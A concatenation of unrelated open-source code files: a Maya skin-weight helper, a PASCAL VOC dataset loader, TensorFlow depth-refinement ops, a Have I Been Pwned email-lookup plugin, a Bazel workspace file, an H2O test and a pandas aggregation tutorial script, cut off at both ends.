om.MIntArray() [influenceIndices.append(self.getPhysicalInfluenceIndex(inf)) for inf in infs] # Get all weights weights = om.MDoubleArray() self.fn.getWeights(dagPath, components, influenceIndices, weights) weights = [w for w in weights] return SkinWeightData(elements, infs, weights) #---------------------------------------------------------------------- def setWeightData(self, data, normalize=True): """ Args: data (SkinWeightData) normalize (bool, Optional): Defaults to True """ # Construct dagPath and components compList = data.getComponents() dagPath, components = utils.getDagPathComponents(compList) # Construct influence indices influenceIndices = om.MIntArray() [influenceIndices.append(self.getPhysicalInfluenceIndex(inf)) for inf in data.getInfluences()] # Construct weights weights = om.MDoubleArray() [weights.append(w) for w in data.getWeights()] oldValues = om.MDoubleArray() self.fn.getWeights(dagPath, components, influenceIndices, oldValues) self.fn.setWeights(dagPath, components, influenceIndices, weights, normalize, oldValues) #---------------------------------------------------------------------- def flushWeights(self, influence): """ Args: influence (str) """ weightData = self.getInfluenceData(influence) skinData = SkinWeightData(weightData.getElements(), [influence], weightData.getWeights()) [skinData.addInfluence(comp, influence, 0.0) for comp in skinData.getComponents()] self.setWeightData(skinData) #---------------------------------------------------------------------- def getInfluenceTransforms(self, space=om.MSpace.kObject): infs = self.listInfluences() if space == om.MSpace.kWorld: return [infs[i].inclusiveMatrix() for i in xrange(infs.length())] return [om.MFnTransform(infs[i]).transformation().asMatrix() for i in xrange(infs.length())]
datasets/Voc_Dataset.py
DLsnowman/Deeplab-v3plus
333
30117
<gh_stars>100-1000 # -*- coding: utf-8 -*- # @Time : 2018/9/21 17:21 # @Author : HLin # @Email : <EMAIL> # @File : Voc_Dataset.py # @Software: PyCharm import PIL import random import scipy.io from PIL import Image, ImageOps, ImageFilter import numpy as np import cv2 import os import torch import torch.utils.data as data import torchvision.transforms as ttransforms class Voc_Dataset(data.Dataset): def __init__(self, root_path='/data/linhua/VOCdevkit', dataset='voc2012_aug', base_size=513, crop_size=513, is_training=True): """ :param root_path: :param dataset: :param base_size: :param is_trainging: :param transforms: """ self.dataset = dataset self.is_training = is_training self.base_size = base_size self.crop_size = crop_size if self.dataset == 'voc2007': self.data_path = os.path.join(root_path, "VOC2007") if is_training: item_list_filepath = os.path.join(self.data_path, "ImageSets/Segmentation/trainval.txt") else: item_list_filepath = os.path.join(self.data_path, "ImageSets/Segmentation/test.txt") elif self.dataset == 'voc2012': self.data_path = os.path.join(root_path, "VOC2012") if is_training: item_list_filepath = os.path.join(self.data_path, "ImageSets/Segmentation/train.txt") else: item_list_filepath = os.path.join(self.data_path, "ImageSets/Segmentation/val.txt") elif self.dataset == 'voc2012_aug': self.data_path = os.path.join(root_path, "VOC2012") if is_training: item_list_filepath = os.path.join(self.data_path, "ImageSets/Segmentation/train_aug.txt") else: item_list_filepath = os.path.join(self.data_path, "ImageSets/Segmentation/val_aug.txt") else: raise Warning("dataset must be voc2007 or voc2012 or voc2012_aug") self.image_filepath = os.path.join(self.data_path, "JPEGImages") self.gt_filepath = os.path.join(self.data_path, "SegmentationClassAug") self.items = [id.strip() for id in open(item_list_filepath)] self.classes = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor'] def __getitem__(self, item): id = self.items[item] gt_image_path = os.path.join(self.gt_filepath, "{}.png".format(id)) gt_image = Image.open(gt_image_path) image_path = os.path.join(self.image_filepath, "{}.jpg".format(id)) image = Image.open(image_path).convert("RGB") if self.is_training: image, gt_image = self._train_sync_transform(image, gt_image) else: image, gt_image = self._val_sync_transform(image, gt_image) return image, gt_image, id def _train_sync_transform(self, img, mask): ''' :param image: PIL input image :param gt_image: PIL input gt_image :return: ''' # random mirror if random.random() < 0.5: img = img.transpose(Image.FLIP_LEFT_RIGHT) mask = mask.transpose(Image.FLIP_LEFT_RIGHT) crop_size = self.crop_size # random scale (short edge) short_size = random.randint(int(self.base_size * 0.5), int(self.base_size * 2.0)) w, h = img.size if h > w: ow = short_size oh = int(1.0 * h * ow / w) else: oh = short_size ow = int(1.0 * w * oh / h) img = img.resize((ow, oh), Image.BILINEAR) mask = mask.resize((ow, oh), Image.NEAREST) # pad crop if short_size < crop_size: padh = crop_size - oh if oh < crop_size else 0 padw = crop_size - ow if ow < crop_size else 0 img = ImageOps.expand(img, border=(0, 0, padw, padh), fill=0) mask = ImageOps.expand(mask, border=(0, 0, padw, padh), fill=0) # random crop crop_size w, h = img.size x1 = random.randint(0, w - crop_size) y1 = random.randint(0, h - crop_size) img = img.crop((x1, y1, x1 + crop_size, y1 + crop_size)) mask = mask.crop((x1, y1, x1 + crop_size, y1 + crop_size)) # gaussian blur as in PSP if random.random() < 0.5: img = img.filter(ImageFilter.GaussianBlur( radius=random.random())) # final transform img, mask = self._img_transform(img), self._mask_transform(mask) return img, mask def _val_sync_transform(self, img, mask): outsize = self.crop_size short_size = outsize w, h = img.size if w > h: oh = short_size ow = int(1.0 * w * oh / h) else: ow = short_size oh = int(1.0 * h * ow / w) img = img.resize((ow, oh), Image.BILINEAR) mask = mask.resize((ow, oh), Image.NEAREST) # center crop w, h = img.size x1 = int(round((w - outsize) / 2.)) y1 = int(round((h - outsize) / 2.)) img = img.crop((x1, y1, x1 + outsize, y1 + outsize)) mask = mask.crop((x1, y1, x1 + outsize, y1 + outsize)) # final transform img, mask = self._img_transform(img), self._mask_transform(mask) return img, mask def _img_transform(self, image): image_transforms = ttransforms.Compose([ ttransforms.ToTensor(), ttransforms.Normalize([.485, .456, .406], [.229, .224, .225]), ]) image = image_transforms(image) return image def _mask_transform(self, gt_image): target = np.array(gt_image).astype('int32') target = torch.from_numpy(target) return target def __len__(self): return len(self.items) class VOCDataLoader(): def __init__(self, args): self.args = args train_set = Voc_Dataset(dataset=self.args.dataset, base_size=self.args.base_size, crop_size=self.args.crop_size, is_training=True) val_set = Voc_Dataset(dataset=self.args.dataset, base_size=self.args.base_size, crop_size=self.args.crop_size, is_training=False) self.train_loader = data.DataLoader(train_set, batch_size=self.args.batch_size, shuffle=True, num_workers=self.args.data_loader_workers, pin_memory=self.args.pin_memory, drop_last=True) self.valid_loader = data.DataLoader(val_set, batch_size=self.args.batch_size, shuffle=False, num_workers=self.args.data_loader_workers, pin_memory=self.args.pin_memory, drop_last=True) self.train_iterations = (len(train_set) + self.args.batch_size) // self.args.batch_size self.valid_iterations = (len(val_set) + self.args.batch_size) // self.args.batch_size if __name__ == '__main__': data=scipy.io.loadmat('/data/linhua/VOCdevkit/BSD/dataset/cls/2008_003846.mat') print(data['GTcls']["Segmentation"][0,0]) print(np.array([[(1,2,3)]]).shape) print(np.array([[np.array(1), np.array(2), np.array(3)]]).shape)
src/ops.py
Elite-Volumetric-Capture-Sqad/DDRNet
128
30128
<reponame>Elite-Volumetric-Capture-Sqad/DDRNet<filename>src/ops.py import numpy as np import sys import tensorflow as tf slim = tf.contrib.slim def convertNHWC2NCHW(data, name): out = tf.transpose(data, [0, 3, 1, 2], name=name) return out def convertNCHW2NHWC(data, name): out = tf.transpose(data, [0, 2, 3, 1], name=name) return out def denormalize(batch_input, low_thres, up_thres, zero2one=False, rm_zeros=False, eps=10.0): # denormalize depth from [-1, 1] to real depth. if not zero2one: # [-1, 1] rel_input = (batch_input + 1.0) / 2.0 else: # [0, 1] rel_input = batch_input denormalized = rel_input * (up_thres - low_thres) + low_thres if rm_zeros: low_mask = tf.less(denormalized, low_thres+eps, name='low_mask') zero_const = tf.zeros_like(denormalized) denormalized = tf.where(low_mask, zero_const, denormalized) return denormalized def compute_normals(depth, config, conv=False, eps=1e-4): # convert NHWC depth to NCHW normal with tf.variable_scope("depth_to_normal"): intrinsics = tf.constant([[536.628 / 640.0, 536.606 / 480.0, 310.591 / 640.0, 234.759 / 480.0]]) intrinsics = tf.tile(intrinsics, [config.batch_size, 1]) depth_real = convertNHWC2NCHW( denormalize(depth, low_thres=config.low_thres, up_thres=config.up_thres), name='depth_NCHW') normals = depth_to_normals_tf(depth_real, intrinsics) if conv: kernel_size = 3 stride = 1 in_channels = normals.get_shape()[1] assert in_channels == 3, 'normals should have 3 channel instead of {}.'.format(in_channels) normal_filter = tf.get_variable("filter", [kernel_size, kernel_size, 1, 1], dtype=tf.float32, initializer=tf.constant_initializer(1.0/(kernel_size*kernel_size)), trainable=False) normals1, normals2, normals3 = tf.split(convertNCHW2NHWC(normals, 'normals_NHWC'), 3, axis=3) normals1 = tf.nn.conv2d(normals1, normal_filter, [1, stride, stride, 1], 'SAME', name='normal_conv_r') normals2 = tf.nn.conv2d(normals2, normal_filter, [1, stride, stride, 1], 'SAME', name='normal_conv_g') normals3 = tf.nn.conv2d(normals3, normal_filter, [1, stride, stride, 1], 'SAME', name='normal_conv_b') normals = tf.concat([normals1, normals2, normals3], 3) unused = tf.less(tf.norm(normals, axis=3), np.sqrt(eps)) unused = tf.stack([unused]*3, axis=3) normals = tf.nn.l2_normalize(normals, 3, epsilon=eps, name='normalize_normals') normals = tf.where(unused, tf.zeros_like(normals), normals) normals = convertNHWC2NCHW(normals, name='normals_NCHW') return normals def depth_to_normals_tf(depth, intrinsics, scope=None, eps=1e-4): """ :param depth: real depth (B,1,H,W) :param intrinsics: (B,4) :return: normals (B,3,H,W) """ with tf.name_scope(scope, 'depth_to_normals_tf', [depth, intrinsics]): H, W = depth.shape.as_list()[-2:] B = tf.shape(depth)[0] # config.batch_size depth = tf.reshape(depth, [B, H, W]) # fx_rel = fx_abs / W, cx_real = cx_abs / W fx, fy, cx, cy = tf.split(tf.expand_dims(intrinsics, 2), 4, axis=1) # (B,1,1) inv_fx = tf.div(1.0, fx * W) inv_fy = tf.div(1.0, fy * H) cx = cx * W cy = cy * H X, Y = tf.meshgrid(tf.range(W), tf.range(H)) X = tf.cast(tf.tile(tf.expand_dims(X, axis=0), [B, 1, 1]), tf.float32) # (B,H,W) Y = tf.cast(tf.tile(tf.expand_dims(Y, axis=0), [B, 1, 1]), tf.float32) x_cord = (X - cx) * inv_fx * depth y_cord = (Y - cy) * inv_fy * depth p = tf.stack([x_cord, y_cord, depth], axis=3, name='p_3d') # (B,H,W,3) # vector of p_3d in west, south, east, north direction p_ctr = p[:, 1:-1, 1:-1, :] vw = p_ctr - p[:, 1:-1, 2:, :] vs = p[:, 2:, 1:-1, :] - p_ctr ve = p_ctr - p[:, 1:-1, :-2, :] vn = p[:, :-2, 1:-1, :] - p_ctr normal_1 = tf.cross(vs, vw, name='cross_1') # (B,H-2,W-2,3) normal_2 = tf.cross(vn, ve, name='cross_2') normal_1 = tf.nn.l2_normalize(normal_1, 3, epsilon=eps) normal_2 = tf.nn.l2_normalize(normal_2, 3, epsilon=eps) normal = normal_1 + normal_2 # unused = tf.less(tf.norm(normal, axis=3), np.sqrt(eps)) # unused = tf.stack([unused] * 3, axis=3) normal = tf.nn.l2_normalize(normal, 3, epsilon=eps, name='normal') # normal = tf.where(unused, tf.zeros_like(normal), normal) paddings = [[0, 0], [1, 1], [1, 1], [0, 0]] normal = tf.pad(normal, paddings) # (B,H,W,3) normal = convertNHWC2NCHW(normal, 'normal_NCHW') return normal def instance_norm(input): with tf.variable_scope("instance_norm"): input = tf.identity(input) channels = input.get_shape()[3] shift = tf.get_variable("shift", [channels], dtype=tf.float32, initializer=tf.zeros_initializer()) scale = tf.get_variable("scale", [channels], dtype=tf.float32, initializer=tf.random_normal_initializer(1.0, 0.02)) mean, variance = tf.nn.moments(input, [1, 2], keep_dims=True) variance_epsilon = 1e-5 normalized = tf.nn.batch_normalization(input, mean, variance, shift, scale, variance_epsilon=variance_epsilon, name='instancenorm') return normalized @slim.add_arg_scope def lrelu(inputs, leak=0.2, scope="lrelu"): """ For tf > 1.4, use tf.nn.leaky_relu() decorate a func with slim.add_arg_scope so that it can be used within an arg_scope in a slim way. """ with tf.variable_scope(scope): f1 = 0.5 * (1 + leak) f2 = 0.5 * (1 - leak) return f1 * inputs + f2 * abs(inputs) def conv_bn_relu(batch_input, kernel_size, stride, out_channels=None): with tf.variable_scope("conv_bn_relu"): in_channels = batch_input.get_shape()[3] if not out_channels: out_channels = in_channels filter = tf.get_variable("filter", [kernel_size, kernel_size, in_channels, out_channels], dtype=tf.float32, initializer=tf.random_normal_initializer(0, 0.02)) convolved = tf.nn.conv2d(batch_input, filter, [1, stride, stride, 1], padding="SAME") normed = batchnorm_u(convolved) rectified = tf.nn.relu(normed) return rectified, filter def resize_conv(x, out_ch, k_size, size_factor): _, in_h, in_w, in_ch = x.shape.as_list() resized = tf.image.resize_nearest_neighbor(x, [in_h * size_factor, in_w * size_factor]) conv = conv_act(resized, out_ch, k_size, 1) return conv def resize_add_conv_u(input, size_factor, out_ch=None, k_size=3, axis=3, act=tf.nn.relu): """ Bilinear Additive Upsampling. see: Wojna, Zbigniew, et al. "The Devil is in the Decoder." arXiv preprint arXiv:1707.05847 (2017). """ with tf.variable_scope("resize_add_conv") as scp: _, in_height, in_width, in_ch = input.shape.as_list() if out_ch: assert in_ch % out_ch == 0, 'cannot add in_ch: {} to out_ch: {}'.format(in_ch, out_ch) else: out_ch, r = divmod(in_ch, (size_factor * size_factor)) assert r == 0, 'in_ch: {} not divisible by size_factor^2'.format(in_ch) ch_split = in_ch / out_ch # bilinear upsample resized = tf.image.resize_images(input, [in_height * size_factor, in_width * size_factor]) stack_list = [] for i in range(out_ch): resized_split = resized[:, :, :, i * ch_split:(i + 1) * ch_split] stack_list.append(tf.reduce_sum(resized_split, axis=axis)) stacked = tf.stack(stack_list, axis=axis) filter = tf.get_variable("filter", [k_size, k_size, out_ch, out_ch], dtype=tf.float32, initializer=tf.random_normal_initializer(0, 0.02)) conv = tf.nn.conv2d(stacked, filter, [1, 1, 1, 1], padding="SAME") if act is not None: conv = tf.nn.relu(conv) return conv def conv_concat(input, skip, axis, conv=True): with tf.variable_scope("concat"): in_ch = input.shape[3] if conv: skip, _ = conv_bn_relu(skip, 3, 1, out_channels=in_ch) return tf.concat([input, skip], axis) def resize_like(inputs, ref, method='NN'): iH, iW = inputs.shape[1], inputs.shape[2] rH, rW = ref.shape[1], ref.shape[2] if iH == rH and iW == rW: return inputs if method == 'NN': return tf.image.resize_nearest_neighbor(inputs, [rH.value, rW.value]) elif method == 'BI': return tf.image.resize_bilinear(inputs, [rH.value, rW.value]) else: raise NotImplementedError('resize method not implemented yet.') def residual_block(inputs, ch_out, stride=1, norm_fn=slim.batch_norm, outputs_collections=None, scope=None): """ Residual_block with pre-activation. see resnet_model.py for more detailed version. """ with tf.variable_scope(scope, "residual_block") as scp: shortcut = tf.identity(inputs, name="shortcut") if norm_fn: preact = norm_fn(inputs, activation_fn=tf.nn.relu, scope="preact") else: preact = tf.nn.relu(inputs, name="preact") residual = slim.conv2d(preact, ch_out, [3, 3], stride=stride, normalizer_fn=norm_fn, activation_fn=tf.nn.relu, scope="conv1") residual = slim.conv2d(residual, ch_out, [3, 3], stride=stride, normalizer_fn=None, activation_fn=None, scope="conv2") output = shortcut + residual return output def rand_shift_depth(depths, low_th, up_th, seed=666): """ :param depths: list of depth maps to be randomly shifted together. depths values shoud be in range [low_th, up_th] :return: list of shifted depth maps """ if len(depths) > 1: depth_ref = depths[1] else: depth_ref = depths[0] ref_min = tf.reduce_min(depth_ref) ref_max = tf.reduce_max(depth_ref) shift_min = low_th - ref_min shift_max = up_th - ref_max shift_val = tf.random_uniform([], minval=shift_min, maxval=shift_max, seed=seed, name='shift_val') depths_shifted = [tf.clip_by_value(d + shift_val, low_th, up_th) for d in depths] return depths_shifted def read_image_from_filename(filename, batch_size, num_threads=4, has_mask=True, has_abd=False, aux_type="JPEG", depth_type=tf.uint16, low_th=500.0, up_th=3000.0, diff_th=5.0, output_height=256, output_width=256, min_after_dequeue=128, use_shuffle_batch=False, rand_crop=True, rand_scale=False, rand_depth_shift=False, rand_flip=True, rand_brightness=True, scope=None): """ :param filename: index csv file for training. :param batch_size: 16 or 32 recommended for Titan X. :param num_threads: 4 or 8. :param has_mask: single channel [0, 255]. offline mask obtained by threshold, instance segmentation or other methods. :param has_abd: offline albedo obtained by intrinsic decomposition methods, if False assume uniform albedo. :param aux_type: auxiliary(e.g. color) image file type. :param depth_type: data type of depth maps. :param low_th: limited lower bound of depth range. :param up_th: limited upper bound of depth range. :param diff_th: threshold to reject bad training pairs with large L1 diff. :param output_height: patch height. :param output_width: patch width. :param min_after_dequeue: see docs of tf.train.shuffle_batch. :param use_shuffle_batch: see docs of tf.train.shuffle_batch. :param rand_crop: random cropping patches for training, change cx, cy. :param rand_flip: random flipping patches, change cx, cy. :param rand_scale: random scaling, change fx, fy, cx, cy. :param rand_depth_shift: only shift depth value, no change in intrinsics. :param rand_brightness: augment color image. :param scope: visualize graphs in tensorboard. :return: depth_raw_batch, depth_ref_batch, color_batch, mask_batch, albedo_batch """ with tf.variable_scope(scope, "image_producer"): # Load index csv file textReader = tf.TextLineReader() csv_path = tf.train.string_input_producer([filename], shuffle=True) _, csv_content = textReader.read(csv_path) if has_mask and has_abd: depth_raw_filename, depth_ref_filename, color_filename, mask_filename, albedo_filename = \ tf.decode_csv(csv_content, [[""], [""], [""], [""], [""]]) elif has_mask: depth_raw_filename, depth_ref_filename, color_filename, mask_filename = \ tf.decode_csv(csv_content, [[""], [""], [""], [""]]) else: depth_raw_filename, depth_ref_filename, color_filename = \ tf.decode_csv(csv_content, [[""], [""], [""]]) # Read and decode image data to tf.float32 tensor depth_raw_data = tf.read_file(depth_raw_filename) depth_ref_data = tf.read_file(depth_ref_filename) color_data = tf.read_file(color_filename) depth_raw_im = tf.image.decode_png(depth_raw_data, channels=1, dtype=depth_type) depth_ref_im = tf.image.decode_png(depth_ref_data, channels=1, dtype=depth_type) if has_mask: mask_data = tf.read_file(mask_filename) mask = tf.image.decode_png(mask_data, channels=1) / 255 mask = tf.cast(mask, tf.float32) if has_abd: albedo_data = tf.read_file(albedo_filename) albedo_im = tf.image.decode_png(albedo_data, channels=1) albedo_im = tf.cast(albedo_im, tf.float32) if aux_type == "JPEG": color_im = tf.image.decode_jpeg(color_data, channels=1) elif aux_type == "PNG": color_im = tf.image.decode_png(color_data, channels=1) else: raise NotImplementedError("unsupport auxiliary image type for now!") depth_raw_im = tf.cast(depth_raw_im, tf.float32) depth_ref_im = tf.cast(depth_ref_im, tf.float32) color_im = tf.cast(color_im, tf.float32) # color_im = tf.image.resize_images(color_im, depth_raw_shape[:2], method=2) # return float Tensor # Concat all images in channel axis to randomly crop together if has_mask and has_abd: concated_im = tf.concat([depth_raw_im, depth_ref_im, color_im, mask, albedo_im], axis=2) n_concat = 5 elif has_mask: concated_im = tf.concat([depth_raw_im, depth_ref_im, color_im, mask], axis=2) n_concat = 4 else: concated_im = tf.concat([depth_raw_im, depth_ref_im, color_im], axis=2) n_concat = 3 # Prepose rand_crop here to reduce unnecessary computation of subsequent data augmentations. if rand_crop: concated_im = tf.random_crop(concated_im, [output_height, output_width, n_concat]) # concated_im = tf.image.crop_to_bounding_box(concated_im, 80, 250, output_height, output_width) # dbg else: concated_im = tf.image.resize_image_with_crop_or_pad(concated_im, output_height, output_width) if has_mask and has_abd: depth_raw_im, depth_ref_im, color_im, mask, albedo_im = tf.split(concated_im, n_concat, axis=2) elif has_mask: depth_raw_im, depth_ref_im, color_im, mask = tf.split(concated_im, n_concat, axis=2) else: depth_raw_im, depth_ref_im, color_im = tf.split(concated_im, 3, axis=2) # Filter bad inputs use diff_mean or mse n_holes = tf.count_nonzero(tf.less(depth_ref_im, tf.constant(50.0)), dtype=tf.float32) diff = tf.abs(tf.subtract(depth_raw_im, depth_ref_im, name='diff')) diff = tf.where(diff<up_th/10, diff, tf.zeros_like(diff)) diff_mean = tf.reduce_mean(diff, name='diff_mean') # mse = tf.reduce_mean(tf.square(diff), name='mse') enqueue_cond = tf.logical_and(tf.less(n_holes, output_height*output_width*2/3), tf.less(diff_mean, diff_th)) def zero_img(): return tf.constant(0, shape=[0, output_height, output_width, n_concat]) def one_img(): # Data augmentation: rand_flip, rand_scale and rand_depth_shift on filtered patches. raw = tf.clip_by_value(depth_raw_im, low_th, up_th) ref = tf.clip_by_value(depth_ref_im, low_th, up_th) if rand_brightness: color = tf.image.random_brightness(color_im, 20) else: color = color_im if rand_depth_shift: raw, ref = rand_shift_depth([raw, ref], low_th, up_th) if has_mask and has_abd: im = tf.concat([raw, ref, color, mask, abd], axis=2) elif has_mask: im = tf.concat([raw, ref, color, mask], axis=2) else: im = tf.concat([raw, ref, color], axis=2) if rand_flip: im = tf.image.random_flip_left_right(im) if rand_scale: pass return tf.expand_dims(im, 0) concated_im = tf.cond(enqueue_cond, one_img, zero_img) ## Pass the 4D batch tensors to a batching op at the end of input data queue # shuffle_batch creates a shuffling queue with dequeue op and enqueue QueueRunner # min_after_dequeue defines how big a buffer we will randomly sample from # bigger means better shuffling but slower start up and more memory used. # capacity must be larger than min_after_dequeue and the amount larger # determines the maximum we will prefetch. # capacity = min_after_dequeue + (num_threads + small_safety_margin) * batch_size if use_shuffle_batch: capacity = min_after_dequeue + (num_threads + 1) * batch_size im_batch = tf.train.shuffle_batch( [concated_im], batch_size=batch_size, capacity=capacity, enqueue_many=True, num_threads=num_threads, min_after_dequeue=min_after_dequeue, allow_smaller_final_batch=True, name="shuffle_batch") else: im_batch = tf.train.batch( [concated_im], batch_size=batch_size, num_threads=num_threads, allow_smaller_final_batch=True, enqueue_many=True, name="batch") # Split concatenated data if has_mask and has_abd: depth_raw_batch, depth_ref_batch, color_batch, mask_batch, albedo_batch = tf.split(im_batch, n_concat, axis=3) elif has_mask: depth_raw_batch, depth_ref_batch, color_batch, mask_batch = tf.split(im_batch, n_concat, axis=3) else: # get mask only from ref(after clip, outliers are equal to low_th) depth_raw_batch, depth_ref_batch, color_batch = tf.split(im_batch, n_concat, axis=3) mask_batch = tf.cast(tf.not_equal(depth_ref_batch, low_th), tf.float32, name='mask_batch') # 0.0 or 1.0 # Normalize depth and color maps with tf.name_scope('normalize'): thres_range = (up_th - low_th) / 2.0 depth_raw_batch = (depth_raw_batch - low_th) / thres_range depth_raw_batch = tf.subtract(depth_raw_batch, 1.0, name='raw_batch') # [low,up]->[-1,1] depth_ref_batch = (depth_ref_batch - low_th) / thres_range depth_ref_batch = tf.subtract(depth_ref_batch, 1.0, name='ref_batch') # [low,up]->[-1,1] color_batch = color_batch * mask_batch / 127.0 color_batch = tf.subtract(color_batch, 1.0, name='aux_batch') # [0,255]->[-1,1] if has_abd: albedo_batch = albedo_batch / 127.0 # offline estimated albedo from RGB, [0,255]->[0,2] else: albedo_batch = None # dbg: return and show last diff_mean in batch return depth_raw_batch, depth_ref_batch, color_batch, mask_batch, albedo_batch, diff_mean
core/plugins/hibp.py
area55git/Gitmails
140
30134
import time import requests from core.utils.parser import Parser from core.utils.helpers import Helpers from core.models.plugin import BasePlugin class HIBP(BasePlugin): def __init__(self, args): self.args = args self.base_url = "https://haveibeenpwned.com/api/v2/breachedaccount" self.url_parameters = "truncateResponse=true&includeUnverified=true" def execute(self, data): Helpers.print_warning("Starting Have I Been Pwned plugin...", jumpline=True) all_emails = Parser(self.args).all_unique_emails(data) if all_emails: self.check_all_emails(all_emails) return True return False def check_authors(self, authors): for author in authors: time.sleep(2) self.check_email(author.email) def check_all_emails(self, emails): for email in emails: time.sleep(2) self.check_email(email) def check_email(self, email): try: url = "{}/{}?{}".format(self.base_url, email, self.url_parameters) r = requests.get(url) if r.status_code == 503: Helpers.print_error("hibp: IP got in DDoS protection by CloudFare") elif r.status_code == 429: Helpers.print_error("hibp: Throttled by HIBP API") elif r.text: r = r.json() print("\n{} leaks:".format(email)) for leak in r: print("\t- {}".format(leak["Name"])) return True return False except Exception as e: Helpers.print_error(e) return False
ml_metadata/workspace.bzl
zijianjoy/ml-metadata
458
30136
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ML METADATA Data Validation external dependencies that can be loaded in WORKSPACE files. """ load("//ml_metadata:mysql_configure.bzl", "mysql_configure") def ml_metadata_workspace(): """All ML Metadata external dependencies.""" mysql_configure()
h2o-py/tests/testdir_misc/pyunit_pubdev_7506_model_download_with_cv.py
vishalbelsare/h2o-3
6,098
30188
<filename>h2o-py/tests/testdir_misc/pyunit_pubdev_7506_model_download_with_cv.py<gh_stars>1000+ #!/usr/bin/env python # -*- encoding: utf-8 -*- import h2o import os from h2o.estimators.gbm import H2OGradientBoostingEstimator from tests import pyunit_utils def model_download_with_cv(): prostate = h2o.import_file(pyunit_utils.locate("smalldata/prostate/prostate.csv")) prostate["CAPSULE"] = prostate["CAPSULE"].asfactor() prostate_gbm = H2OGradientBoostingEstimator(nfolds=2, keep_cross_validation_predictions=True) prostate_gbm.train(x=["AGE", "RACE", "PSA", "DCAPS"], y="CAPSULE", training_frame=prostate) path = pyunit_utils.locate("results") model_path = h2o.download_model(prostate_gbm, path=path, export_cross_validation_predictions=True) assert os.path.isfile(model_path), "Expected model artifact {0} to exist, but it does not.".format(model_path) h2o.remove_all() prostate_gbm_reloaded = h2o.upload_model(model_path) assert isinstance(prostate_gbm_reloaded, H2OGradientBoostingEstimator), \ "Expected H2OGradientBoostingEstimator, but got {0}".format(prostate_gbm_reloaded) holdout_frame_id = prostate_gbm.cross_validation_holdout_predictions().frame_id assert h2o.get_frame(holdout_frame_id) is not None if __name__ == "__main__": pyunit_utils.standalone_test(model_download_with_cv) else: model_download_with_cv()
notebook/pandas_agg.py
vhn0912/python-snippets
174
30194
import pandas as pd import numpy as np print(pd.__version__) # 1.0.0 print(pd.DataFrame.agg is pd.DataFrame.aggregate) # True df = pd.DataFrame({'A': [0, 1, 2], 'B': [3, 4, 5]}) print(df) # A B # 0 0 3 # 1 1 4 # 2 2 5 print(df.agg(['sum', 'mean', 'min', 'max'])) # A B # sum 3.0 12.0 # mean 1.0 4.0 # min 0.0 3.0 # max 2.0 5.0 print(type(df.agg(['sum', 'mean', 'min', 'max']))) # <class 'pandas.core.frame.DataFrame'> print(df.agg(['sum'])) # A B # sum 3 12 print(type(df.agg(['sum']))) # <class 'pandas.core.frame.DataFrame'> print(df.agg('sum')) # A 3 # B 12 # dtype: int64 print(type(df.agg('sum'))) # <class 'pandas.core.series.Series'> print(df.agg({'A': ['sum', 'min', 'max'], 'B': ['mean', 'min', 'max']})) # A B # max 2.0 5.0 # mean NaN 4.0 # min 0.0 3.0 # sum 3.0 NaN print(df.agg({'A': 'sum', 'B': 'mean'})) # A 3.0 # B 4.0 # dtype: float64 print(df.agg({'A': ['sum'], 'B': ['mean']})) # A B # mean NaN 4.0 # sum 3.0 NaN print(df.agg({'A': ['min', 'max'], 'B': 'mean'})) # A B # max 2.0 NaN # mean NaN 4.0 # min 0.0 NaN print(df.agg(['sum', 'mean', 'min', 'max'], axis=1)) # sum mean min max # 0 3.0 1.5 0.0 3.0 # 1 5.0 2.5 1.0 4.0 # 2 7.0 3.5 2.0 5.0 s = df['A'] print(s) # 0 0 # 1 1 # 2 2 # Name: A, dtype: int64 print(s.agg(['sum', 'mean', 'min', 'max'])) # sum 3.0 # mean 1.0 # min 0.0 # max 2.0 # Name: A, dtype: float64 print(type(s.agg(['sum', 'mean', 'min', 'max']))) # <class 'pandas.core.series.Series'> print(s.agg(['sum'])) # sum 3 # Name: A, dtype: int64 print(type(s.agg(['sum']))) # <class 'pandas.core.series.Series'> print(s.agg('sum')) # 3 print(type(s.agg('sum'))) # <class 'numpy.int64'> print(s.agg({'Total': 'sum', 'Average': 'mean', 'Min': 'min', 'Max': 'max'})) # Total 3.0 # Average 1.0 # Min 0.0 # Max 2.0 # Name: A, dtype: float64 # print(s.agg({'NewLabel_1': ['sum', 'max'], 'NewLabel_2': ['mean', 'min']})) # SpecificationError: nested renamer is not supported print(df.agg(['mad', 'amax', 'dtype'])) # A B # mad 0.666667 0.666667 # amax 2 5 # dtype int64 int64 print(df['A'].mad()) # 0.6666666666666666 print(np.amax(df['A'])) # 2 print(df['A'].dtype) # int64 # print(df.agg(['xxx'])) # AttributeError: 'xxx' is not a valid function for 'Series' object # print(df.agg('xxx')) # AttributeError: 'xxx' is not a valid function for 'DataFrame' object print(hasattr(pd.DataFrame, '__array__')) # True print(hasattr(pd.core.groupby.GroupBy, '__array__')) # False print(df.agg([np.sum, max])) # A B # sum 3 12 # max 2 5 print(np.sum(df['A'])) # 3 print(max(df['A'])) # 2 print(np.abs(df['A'])) # 0 0 # 1 1 # 2 2 # Name: A, dtype: int64 print(df.agg([np.abs])) # A B # absolute absolute # 0 0 3 # 1 1 4 # 2 2 5 # print(df.agg([np.abs, max])) # ValueError: cannot combine transform and aggregation operations def my_func(x): return min(x) / max(x) print(df.agg([my_func, lambda x: min(x) / max(x)])) # A B # my_func 0.0 0.6 # <lambda> 0.0 0.6 print(df['A'].std()) # 1.0 print(df['A'].std(ddof=0)) # 0.816496580927726 print(df.agg(['std', lambda x: x.std(ddof=0)])) # A B # std 1.000000 1.000000 # <lambda> 0.816497 0.816497 print(df.agg('std', ddof=0)) # A 0.816497 # B 0.816497 # dtype: float64 print(df.agg(['std'], ddof=0)) # A B # std 1.0 1.0 df_str = df.assign(C=['X', 'Y', 'Z']) print(df_str) # A B C # 0 0 3 X # 1 1 4 Y # 2 2 5 Z # df_str['C'].mean() # TypeError: Could not convert XYZ to numeric print(df_str.agg(['sum', 'mean'])) # A B C # sum 3.0 12.0 XYZ # mean 1.0 4.0 NaN print(df_str.agg(['mean', 